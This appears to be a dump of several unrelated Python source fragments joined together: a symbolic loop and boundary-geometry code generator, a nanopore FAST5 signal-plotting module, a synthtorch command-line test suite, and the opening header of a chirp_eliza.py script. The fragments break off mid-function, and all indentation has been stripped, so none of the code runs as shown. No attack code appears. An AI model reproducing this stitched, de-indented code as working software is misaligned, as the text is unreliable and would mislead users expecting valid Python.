body = fusion_loops(body)
return body
#==============================================================================
def select_loops(indices, ranges, body, boundary, boundary_basis=False):
quad_mask = []
quad_ext = []
if boundary:
if isinstance(boundary, Boundary):
quad_mask = [boundary.axis]
quad_ext = [boundary.ext]
else:
raise TypeError
# discrete_boundary gives the perpendicular indices, then we need to
# remove them from directions
dim = len(indices)
dims = [i for i in range(dim-1,-1,-1) if not( i in quad_mask )]
for i in dims:
rx = ranges[i]
x = indices[i]
start = rx.start
end = rx.stop
rx = Range(start, end)
body = [For(x, rx, body)]
body = fusion_loops(body)
return body
#==============================================================================
def fusion_loops(loops):
ranges = []
indices = []
loops_cp = loops
while len(loops) == 1 and isinstance(loops[0], For):
loops = loops[0]
target = loops.target
iterable = loops.iterable
if isinstance(iterable, Product):
ranges += list(iterable.elements)
indices += list(target)
if not isinstance(target,(tuple,list,Tuple)):
raise ValueError('target must be a list or a tuple of indices')
elif isinstance(iterable, Range):
ranges.append(iterable)
indices.append(target)
else:
raise TypeError('only range an product are supported')
loops = loops.body
if len(ranges)>1:
return [For(indices, Product(*ranges), loops)]
else:
return loops_cp
#==============================================================================
def compute_boundary_jacobian(parent_namespace, boundary, mapping=None):
# Sanity check on arguments
if not isinstance(boundary, Boundary):
raise TypeError(boundary)
if mapping is None:
stmts = []
else:
# Compute metric determinant g on manifold
J = SymbolicExpr(mapping.jacobian)
Jm = J[:, [i for i in range(J.shape[1]) if i != boundary.axis]]
g = (Jm.T * Jm).det()
# Create statements for computing sqrt(g)
det_jac_bnd = parent_namespace['det_jac_bnd']
stmts = [Assign(det_jac_bnd, sympy_sqrt(g))]
return stmts
#==============================================================================
def compute_normal_vector(parent_namespace, vector, boundary, mapping=None):
# Sanity check on arguments
if isinstance(boundary, Boundary):
axis = boundary.axis
ext = boundary.ext
else:
raise TypeError(boundary)
# If there is no mapping, normal vector has only one non-zero component,
# which is +1 or -1 according to the orientation of the boundary.
if mapping is None:
return [Assign(v, ext if i==axis else 0) for i, v in enumerate(vector)]
# Given the Jacobian matrix J, we need to extract the (i=axis) row of
# J^(-1) and then normalize it. We recall that J^(-1)[i, j] is equal to
# the cofactor of J[i, j] divided by det(J). For efficiency we only
# compute the cofactors C[i=0:dim] of the (j=axis) column of J, and we
# do not divide them by det(J) because the normal vector will need to
# be normalized anyway.
#
# NOTE: we also change the vector orientation according to 'ext'
J = SymbolicExpr(mapping.jacobian)
values = [ext * J.cofactor(i, j=axis) for i in range(J.shape[0])]
# Create statements for computing normal vector components
stmts = [Assign(lhs, rhs) for lhs, rhs in zip(vector, values)]
# Normalize vector
inv_norm_variable = Symbol('inv_norm')
inv_norm_value = 1 / sympy_sqrt(sum(v**2 for v in values))
stmts += [Assign(inv_norm_variable, inv_norm_value)]
stmts += [AugAssign(v, '*', inv_norm_variable) for v in vector]
return stmts
#==============================================================================
def compute_tangent_vector(parent_namespace, vector, boundary, mapping):
raise NotImplementedError('TODO')
#==============================================================================
_range = re.compile('([0-9]*:[0-9]+|[a-zA-Z]?:[a-zA-Z])')
def variables(names, dtype, **args):
def contruct_variable(cls, name, dtype, rank, **args):
if issubclass(cls, Variable):
return Variable(dtype, name, rank=rank, **args)
elif issubclass(cls, IndexedVariable):
return IndexedVariable(name, dtype=dtype, rank=rank, **args)
elif cls==Idx:
assert dtype == "int"
rank = args.pop('rank', 0)
assert rank == 0
return Idx(name)
else:
raise TypeError('only Variables and IndexedVariables are supported')
result = []
cls = args.pop('cls', Variable)
rank = args.pop('rank', 0)
if isinstance(names, str):
marker = 0
literals = [r'\,', r'\:', r'\ ']
for i in range(len(literals)):
lit = literals.pop(0)
if lit in names:
while chr(marker) in names:
marker += 1
lit_char = chr(marker)
marker += 1
names = names.replace(lit, lit_char)
literals.append((lit_char, lit[1:]))
def literal(s):
if literals:
for c, l in literals:
s = s.replace(c, l)
return s
names = names.strip()
as_seq = names.endswith(',')
if as_seq:
names = names[:-1].rstrip()
if not names:
raise ValueError('no symbols given')
# split on commas
names = [n.strip() for n in names.split(',')]
if not all(n for n in names):
raise ValueError('missing symbol between commas')
# split on spaces
for i in range(len(names) - 1, -1, -1):
names[i: i + 1] = names[i].split()
seq = args.pop('seq', as_seq)
for name in names:
if not name:
raise ValueError('missing variable')
if ':' not in name:
var = contruct_variable(cls, literal(name), dtype, rank, **args)
result.append(var)
continue
split = _range.split(name)
# remove 1 layer of bounding parentheses around ranges
for i in range(len(split) - 1):
if i and ':' in split[i] and split[i] != ':' and \
split[i - 1].endswith('(') and \
split[i + 1].startswith(')'):
split[i - 1] = split[i - 1][:-1]
split[i + 1] = split[i + 1][1:]
for i, s in enumerate(split):
if ':' in s:
if s[-1].endswith(':'):
raise ValueError('missing end range')
a, b = s.split(':')
if b[-1] in string.digits:
a = 0 if not a else int(a)
b = int(b)
split[i] = [str(c) for c in range(a, b)]
else:
a = a or 'a'
split[i] = [string.ascii_letters[c] for c in range(
string.ascii_letters.index(a),
string.ascii_letters.index(b) + 1)] # inclusive
| |
if r_means is not None]
return np.column_stack(reg_events)
def get_event_data(
all_reg_data, plot_types, num_bases, corrected_group,
overplot_thresh, group_num='Group1'):
Position, Signal, Strand, Region = [], [], [], []
for reg_plot_sig, (
region_i, interval_start, chrom, reg_reads) in zip(
plot_types, all_reg_data):
if reg_plot_sig != 'Violin': continue
for strand in ('+', '-'):
if sum(r_data.strand == strand
for r_data in reg_reads) == 0:
continue
reg_events = get_reg_events(
reg_reads, interval_start, num_bases, strand)
for pos, base_read_means in enumerate(reg_events):
# skip bases with no coverage
if sum(~np.isnan(base_read_means)) == 0:
continue
# remove nan regions of reads from partial overlaps
base_read_means = base_read_means[
~np.isnan(base_read_means)]
Position.extend(repeat(
pos + interval_start, base_read_means.shape[0]))
Signal.extend(base_read_means)
Strand.extend(repeat(
FWD_STRAND if strand == '+' else REV_STRAND,
base_read_means.shape[0]))
Region.extend(repeat(
region_i, base_read_means.shape[0]))
return r.DataFrame({
'Position':r.IntVector(Position),
'Signal':r.FloatVector(Signal),
'Strand':r.StrVector(Strand),
'Region':r.StrVector(Region),
'Group':r.StrVector(list(repeat(group_num, len(Position))))})
def get_boxplot_data(
all_reg_data, plot_types, num_bases, corrected_group,
overplot_thresh, group_num='Group1'):
(Position, SigMin, Sig25, SigMed, Sig75, SigMax, Strand, Region) = (
[], [], [], [], [], [], [], [])
for reg_plot_sig, (
region_i, interval_start, chrom, reg_reads) in zip(
plot_types, all_reg_data):
if reg_plot_sig != 'Boxplot': continue
for strand in ('+', '-'):
if sum(r_data.strand == strand
for r_data in reg_reads) == 0:
continue
reg_events = get_reg_events(
reg_reads, interval_start, num_bases, strand)
for pos, base_read_means in enumerate(reg_events):
# skip regions with no coverage
if sum(~np.isnan(base_read_means)) == 0:
continue
# remove nan regions of reads from partial overlaps
base_read_means = base_read_means[
~np.isnan(base_read_means)]
Position.append(pos + interval_start)
SigMin.append(np.percentile(base_read_means, 0))
Sig25.append(np.percentile(base_read_means, 25))
SigMed.append(np.percentile(base_read_means, 50))
Sig75.append(np.percentile(base_read_means, 75))
SigMax.append(np.percentile(base_read_means, 100))
Strand.append(
FWD_STRAND if strand == '+' else REV_STRAND)
Region.append(region_i)
return r.DataFrame({
'Position':r.IntVector(Position),
'SigMin':r.FloatVector(SigMin),
'Sig25':r.FloatVector(Sig25),
'SigMed':r.FloatVector(SigMed),
'Sig75':r.FloatVector(Sig75),
'SigMax':r.FloatVector(SigMax),
'Strand':r.StrVector(Strand),
'Region':r.StrVector(Region),
'Group':r.StrVector(list(repeat(group_num, len(Position))))})
def get_quant_data(
all_reg_data, plot_types, num_bases, corrected_group,
overplot_thresh, group_num='Group1', pos_offest=0,
pcntls=[1,10,20,30,40,49]):
upper_pcntls = [100 - pcntl for pcntl in pcntls]
Position, Lower, Upper, Strand, Region = [], [], [], [], []
for reg_plot_sig, (
region_i, interval_start, chrom, reg_reads) in zip(
plot_types, all_reg_data):
if reg_plot_sig != 'Quantile': continue
for strand in ('+', '-'):
if sum(r_data.strand == strand
for r_data in reg_reads) == 0:
continue
reg_events = get_reg_events(
reg_reads, interval_start, num_bases, strand)
for pos, base_read_means in enumerate(reg_events):
# skip regions with no coverage
if sum(~np.isnan(base_read_means)) == 0:
continue
# remove nan regions of reads from partial overlaps
base_read_means = base_read_means[
~np.isnan(base_read_means)]
Position.extend(list(repeat(
pos + interval_start + pos_offest, len(pcntls))))
Lower.extend(np.percentile(
base_read_means, pcntls, interpolation='nearest'))
Upper.extend(np.percentile(
base_read_means, upper_pcntls,
interpolation='nearest'))
Strand.extend(
list(repeat(FWD_STRAND if strand == '+' else
REV_STRAND, len(pcntls))))
Region.extend(list(repeat(region_i, len(pcntls))))
return r.DataFrame({
'Position':r.FloatVector(Position),
'Lower':r.FloatVector(Lower),
'Upper':r.FloatVector(Upper),
'Strand':r.StrVector(Strand),
'Region':r.StrVector(Region),
'Group':r.StrVector(list(repeat(group_num, len(Position))))})
def get_signal(read_fn, read_start_rel_to_raw, num_obs, corrected_group):
with h5py.File(read_fn) as fast5_data:
# retrieve shift and scale computed in correction script
corr_subgrp = fast5_data['/Analyses/' + corrected_group]
shift = corr_subgrp.attrs['shift']
scale = corr_subgrp.attrs['scale']
lower_lim = corr_subgrp.attrs['lower_lim']
upper_lim = corr_subgrp.attrs['upper_lim']
r_sig, scale_values = nh.normalize_raw_signal(
fast5_data['/Raw/Reads'].values()[0]['Signal'],
read_start_rel_to_raw, num_obs, shift=shift, scale=scale,
lower_lim=lower_lim, upper_lim=upper_lim)
return r_sig
def get_signal_data(
all_reg_data, plot_types, num_bases, corrected_group,
overplot_thresh, group_num='Group1'):
Position, Signal, Read, Strand, Region = [], [], [], [], []
for reg_plot_sig, (
region_i, interval_start, chrom, reg_reads) in zip(
plot_types, all_reg_data):
if not reg_plot_sig in ('Signal', 'Downsample'): continue
if reg_plot_sig == 'Downsample':
plus_reads = [r_data for r_data in reg_reads
if r_data.strand == '+']
minus_reads = [r_data for r_data in reg_reads
if r_data.strand == '-']
# randomly select reads to plot if too many
if len(plus_reads) > overplot_thresh:
np.random.shuffle(plus_reads)
plus_reads = plus_reads[:overplot_thresh]
if len(minus_reads) > overplot_thresh:
np.random.shuffle(minus_reads)
minus_reads = minus_reads[:overplot_thresh]
reg_reads = plus_reads + minus_reads
for r_num, r_data in enumerate(reg_reads):
r_strand = r_data.strand
segs = r_data.segs
if r_strand == "-":
segs = (segs[::-1] * -1) + segs[-1]
if interval_start < r_data.start:
# handle reads that start in the middle of the interval
start_offset = r_data.start - interval_start
overlap_seg_data = segs[:num_bases - start_offset + 1]
else:
start_offset = 0
skipped_bases = interval_start - r_data.start
overlap_seg_data = segs[
skipped_bases:skipped_bases + num_bases + 1]
num_reg_obs = overlap_seg_data[-1] - overlap_seg_data[0]
if r_strand == "+":
reg_start_rel_raw = (r_data.read_start_rel_to_raw +
overlap_seg_data[0])
r_sig = get_signal(
r_data.fn, reg_start_rel_raw, num_reg_obs,
r_data.corr_group)
else:
reg_start_rel_raw = (r_data.read_start_rel_to_raw +
segs[-1] - overlap_seg_data[-1])
r_sig = get_signal(
r_data.fn, reg_start_rel_raw, num_reg_obs,
r_data.corr_group)
r_sig = r_sig[::-1]
for base_i, (start, stop) in enumerate(zip(
overlap_seg_data[:-1], overlap_seg_data[1:])):
Position.extend(
interval_start + base_i + start_offset +
np.linspace(0, 1, stop - start, endpoint=False))
Signal.extend(r_sig[start-overlap_seg_data[0]:
stop-overlap_seg_data[0]])
Read.extend(list(repeat(
str(r_num) + '_' + group_num, stop - start)))
Strand.extend(list(repeat(
FWD_STRAND if r_strand == '+' else
REV_STRAND, stop - start)))
Region.extend(list(repeat(region_i, stop - start)))
return r.DataFrame({
'Position':r.FloatVector(Position),
'Signal':r.FloatVector(Signal),
'Read':r.StrVector(Read),
'Strand':r.StrVector(Strand),
'Region':r.StrVector(Region),
'Group':r.StrVector(list(repeat(group_num, len(Position))))})
def get_plot_types_data(plot_args, quant_offset=0):
SignalData = get_signal_data(*plot_args)
QuantData = get_quant_data(*plot_args, pos_offest=quant_offset)
BoxData = get_boxplot_data(*plot_args)
EventData = get_event_data(*plot_args)
return SignalData, QuantData, BoxData, EventData
def get_reg_base_data(all_reg_data, corrected_group, num_bases):
all_reg_base_data = []
for region_i, interval_start, chrom, reg_reads in all_reg_data:
# try to find first read to overlap whole region
try:
full_cov_read = next(
read_data for read_data in reg_reads
if read_data.start <= interval_start and
read_data.end >= interval_start + num_bases)
# get seq data from first read FAST5 file
with h5py.File(full_cov_read.fn) as r_data:
seq = ''.join(r_data[
'Analyses/' + full_cov_read.corr_group +
'/Events']['base'])
r_base_data = (seq if full_cov_read.strand == "+"
else nh.rev_comp(seq))
reg_base_data = r_base_data[
interval_start - full_cov_read.start:
interval_start - full_cov_read.start + num_bases]
except StopIteration:
# handle case where no read overlaps whole region
# let each read contibute its sequence and fill the rest
# with dashes
reg_base_data = ['-',] * num_bases
for read_data in reg_reads:
with h5py.File(read_data.fn) as r_data:
seq = ''.join(r_data[
'Analyses/' + read_data.corr_group +
'/Events']['base'])
if read_data.strand == "-":
seq = nh.rev_comp(seq)
if read_data.start > interval_start:
# handle reads that start in the middle of a region
start_overlap = (interval_start + num_bases -
read_data.start)
reg_base_data[-start_overlap:] = seq[:start_overlap]
else:
# get the number of bases from end of read that
# overlap the region
end_overlap = read_data.end - interval_start
reg_base_data[:end_overlap] = seq[-end_overlap:]
reg_base_data = ''.join(reg_base_data)
all_reg_base_data.append(reg_base_data)
return all_reg_base_data
def get_base_r_data(all_reg_data, all_reg_base_data):
BaseStart, Bases, BaseRegion = [], [], []
for (region_i, interval_start, chrom, reg_reads
), reg_base_data in zip(
all_reg_data, all_reg_base_data):
for i, base in enumerate(reg_base_data):
BaseStart.append(str(i + interval_start))
Bases.append(base)
BaseRegion.append(region_i)
return r.DataFrame({
'Position':r.FloatVector(BaseStart),
'Base':r.StrVector(Bases),
'Region':r.StrVector(BaseRegion)})
def get_region_reads(
plot_intervals, raw_read_coverage, num_bases,
filter_no_cov=True):
def get_c_s_data(chrm, strand, start, end):
if (chrm, strand) in raw_read_coverage:
return [
r_data for r_data in raw_read_coverage[(chrm, strand)]
if not (r_data.start >= end or r_data.end < start + 1)]
return []
all_reg_data = []
for region_i, (chrm, int_start, strand, stat) in plot_intervals:
# get all reads that overlap this interval
# note that this includes partial overlaps as these contribute
# to coverage and other statistics so can't really restrict to
# full coverage as previous versions of code did
int_end = int_start + num_bases
if strand is None:
# if strand is None, get data from both strands
all_reg_data.append((
region_i, int_start, chrm,
get_c_s_data(chrm, '+', int_start, int_end) +
get_c_s_data(chrm, '-', int_start, int_end)))
else:
all_reg_data.append((
region_i, int_start, chrm,
get_c_s_data(chrm, strand, int_start, int_end)))
no_cov_regions = [
(len(r_data) == 0, chrm + ':' + str(start))
for reg_i, start, chrm, r_data in all_reg_data]
if not filter_no_cov:
return all_reg_data, no_cov_regions
# filter out no coverage regions
plot_intervals = [
p_int for p_int, no_cov in zip(plot_intervals, no_cov_regions)
if not no_cov[0]]
all_reg_data = [
reg_data for reg_data in all_reg_data if len(reg_data[3]) > 0]
if any(no_cov[0] for no_cov in no_cov_regions):
sys.stderr.write(
'**** WARNING **** No coverage in regions: ' +
'; '.join([reg for no_cov, reg in no_cov_regions
if no_cov]) + '\n')
return all_reg_data, plot_intervals
########################################
#### Base plotting linker functions ####
########################################
def plot_corrections(
plot_intervals, reg_width, num_reads,
corrected_group, basecall_subgroup, pdf_fn):
if VERBOSE: sys.stderr.write('Preparing plot data.\n')
OldSegDat, NewSegDat, SigDat, DiffDat = [], [], [], []
for read_fn, reg_type in plot_intervals:
try:
old_dat, new_dat, signal_dat, diff_dat \
= get_read_correction_data(
read_fn, reg_type, reg_width, corrected_group + '/' +
basecall_subgroup)
# some FAST5 files give an error:
# IOError: "Can't read data (Inflate() failed)"
# KeyError: No 'Raw' slot 'Unable to open object'
except (IOError, KeyError) as e:
continue
if old_dat is None:
# skip reads that don't have correction slots b/c they
# couldn't be corrected
continue
OldSegDat.append(old_dat)
NewSegDat.append(new_dat)
SigDat.append(signal_dat)
DiffDat.append(diff_dat)
if len(OldSegDat) >= num_reads:
break
if len(OldSegDat) == 0:
sys.stderr.write(
'ERROR: No reads were able to be processed. Check ' +
'--fast5-basedirs for FAST5 files and that ' +
'--corrected-group and --basecall-subgroup are correct ' +
'for the reads provided .\n')
sys.exit()
if VERBOSE and len(OldSegDat) < num_reads:
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
tests.test_exec
test the synthtorch command line interfaces for runtime errors
Author: <NAME> (<EMAIL>)
Created on: Sep 07, 2018
"""
import os
import unittest
import torch
torch.autograd.set_detect_anomaly(True)
from synthtorch.exec.nn_train import main as nn_train
from synthtorch.exec.nn_predict import main as nn_predict
from ._test_funcs import TestCLI
class TestNConv(TestCLI):
def test_nconv_nopatch_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv_nopatch.mdl -na nconv -ne 1 -nl 2 -bs 2 -dm 3 '
f'--plot-loss {self.out_dir}/loss.png -ocf {self.jsonfn} '
f'-vsd {self.train_dir} -vtd {self.train_dir} -v').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_patch_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 1 -nl 1 -ps 16 16 '
f'-ocf {self.jsonfn} -bs 2').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_preload_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 1 -nl 1 -ps 16 16 '
f'-ocf {self.jsonfn} -bs 2 -pr').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_swish_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 1 -nl 1 -ps 16 16 '
f'-ocf {self.jsonfn} -bs 2 -ac swish').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_checkpoint_and_load_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 2 -nl 1 -ps 16 16 '
f'-ocf {self.jsonfn} -bs 2 -chk 1').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
args = self.train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 2 -nl 1 -ps 16 16 '
f'-ocf {self.jsonfn} -bs 2').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_cyclic_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 3 -nl 1 -ps 16 16 '
f'-ocf {self.jsonfn} -bs 2 -lrs cyclic -v -opt sgdw').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_restarts_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 3 -nl 1 -ps 16 16 '
f'-ocf {self.jsonfn} -bs 2 -lrs cosinerestarts -tm 2 -rp 2 -v').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_amsgrad_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 3 -nl 1 -ps 16 16 '
f'-ocf {self.jsonfn} -bs 2 -v -opt amsgrad').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_nesterov_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 3 -nl 1 -ps 16 16 '
f'-ocf {self.jsonfn} -bs 2 -v -opt nsgd').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_nesterovw_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 3 -nl 1 -ps 16 16 '
f'-ocf {self.jsonfn} -bs 2 -v -opt nsgdw').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_sgdw_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 3 -nl 1 -ps 16 16 '
f'-ocf {self.jsonfn} -bs 2 -v -opt sgdw').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_weightdecay_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 3 -nl 1 -ps 16 16 '
f'-ocf {self.jsonfn} -bs 2 -v -wd 0.1').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_writecsv_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 3 -nl 1 -ps 16 16 '
f'-ocf {self.jsonfn} -bs 2 -v -csv {self.out_dir}/test.csv').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
def test_nconv_data_aug_2d_cli(self):
train_args = f'-s {self.train_dir}/tif/ -t {self.train_dir}/tif/'.split()
args = train_args + (f'-o {self.out_dir}/nconv_nopatch.mdl -na nconv -ne 1 -nl 2 -bs 2 '
f'--plot-loss {self.out_dir}/loss.png -ocf {self.jsonfn} -e tif '
f'-p 1 1 1 1 1 -r 10 -ts 0.5 -sc 0.1 -mean 1 -std 1 '
f'-hf -vf -g 0.1 -gn 0.2 -pwr 1 -tx -ty -blk 5 6 -th 0').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_data_aug_3d_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv_nopatch.mdl -na nconv -ne 1 -nl 2 -bs 2 '
f'--plot-loss {self.out_dir}/loss.png -ocf {self.jsonfn} -dm 3 '
f'-vsd {self.train_dir} -vtd {self.train_dir} -p 0 0 1 1 1 '
f'-g 0.01 -gn 0 -pwr 1 -tx -ty -blk 5 10 -mean 1 -std 1').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_clip_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 1 -nl 1 -ps 16 16 '
f'-ocf {self.jsonfn} -bs 2 -c 0.25').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_whole_img_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 1 -nl 1 -dm 3 '
f'-ocf {self.jsonfn} -bs 1').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_2d_crop_cli(self):
train_args = f'-s {self.train_dir}/tif/ -t {self.train_dir}/tif/'.split()
args = train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 1 -nl 1 -cbp 1 -bs 2 -e tif -ps 8 8 '
f'-ocf {self.jsonfn}').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_2d_var_cli(self):
train_args = f'-s {self.train_dir}/tif/ -t {self.train_dir}/tif/'.split()
args = train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 1 -nl 1 -cbp 1 -bs 2 -e tif '
f'-ocf {self.jsonfn}').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn, calc_var=True)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_png_cli(self):
train_args = f'-s {self.train_dir}/png/ -t {self.train_dir}/png/'.split()
args = train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 1 -nl 1 -cbp 1 -bs 2 -e png '
f'-ocf {self.jsonfn} -p 1 1 0 0 0 ').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn, calc_var=True, png_out=True)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_color_cli(self):
train_args = f'-s {self.train_dir}/color/ -t {self.train_dir}/color/'.split()
args = train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 1 -nl 1 -cbp 1 -bs 2 -e png -co -dm 2 '
f'-ocf {self.jsonfn}').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn, color_out=True, bs=1)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
@unittest.skipIf("TRAVIS" in os.environ and os.environ["TRAVIS"] == "true", "Skipping this test on Travis CI.")
def test_nconv_color_tb_cli(self):
train_args = f'-s {self.train_dir}/color/ -t {self.train_dir}/color/'.split()
args = train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 1 -nl 1 -cbp 1 -bs 2 -e png -co -dm 2 '
f'-ocf {self.jsonfn} -tb').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn, color_out=True, bs=1)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_tif_predict_cli(self):
train_args = f'-s {self.train_dir}/tif/ -t {self.train_dir}/tif/'.split()
args = train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 1 -nl 1 -cbp 1 -bs 2 -e tif '
f'-ocf {self.jsonfn}').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn, calc_var=True, tif_out=True)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_3d_var_cli(self):
args = self.train_args + (f'-o {self.out_dir}/nconv.mdl -na nconv -ne 1 -nl 1 -cbp 1 -bs 1 -dm 3 '
f'-ocf {self.jsonfn}').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn, calc_var=True)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_multimodal_cli(self):
train_args = f'-s {self.train_dir} {self.train_dir} -t {self.train_dir} {self.train_dir}'.split()
args = train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 1 -nl 1 -ps 16 16 '
f'-ocf {self.jsonfn} -bs 2').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn, multi=2)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_nconv_multimodal_tiff_cli(self):
train_args = f'-s {self.train_dir}/tif/ {self.train_dir}/tif/ -t {self.train_dir}/tif/ {self.train_dir}/tif/'.split()
args = train_args + (f'-o {self.out_dir}/nconv_patch.mdl -na nconv -ne 1 -nl 1 -ps 16 16 '
f'-ocf {self.jsonfn} -bs 2 -e tif -th 0').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn, multi=2)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
class TestDenseNet(TestCLI):
def test_densenet_cli(self):
train_args = f'-s {self.train_dir}/tif/ -t {self.train_dir}/tif/'.split()
args = train_args + (f'-o {self.out_dir}/densenet.mdl -na densenet -ne 1 -bs 2 -e tif '
f'-ocf {self.jsonfn}').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
class TestUnet(TestCLI):
def test_unet_cli(self):
args = self.train_args + (f'-o {self.out_dir}/unet.mdl -na unet -ne 1 -nl 3 -cbp 1 -ps 16 16 16 -bs 2 -dm 3 '
f'-ocf {self.jsonfn}').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_unet_freeze_cli(self):
args = self.train_args + (f'-o {self.out_dir}/unet.mdl -na unet -ne 1 -nl 3 -cbp 1 -ps 16 16 16 -bs 2 -dm 3 '
f'-ocf {self.jsonfn} -fr').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval = nn_predict([self.jsonfn])
self.assertEqual(retval, 0)
def test_unet_ic_cli(self):
args = self.train_args + (f'-o {self.out_dir}/unet.mdl -na unet -ne 1 -nl 3 -cbp 1 -ps 16 16 16 -bs 2 -dm 3 '
f'-ocf {self.jsonfn} -ic').split()
retval = nn_train(args)
self.assertEqual(retval, 0)
self._modify_ocf(self.jsonfn)
retval | |
<reponame>satoruisaka/chirptalk<gh_stars>0
"""
chirp_eliza.py - chirptalk between two devices with Eliza-like conversation exchange
<NAME>
December 27, 2019
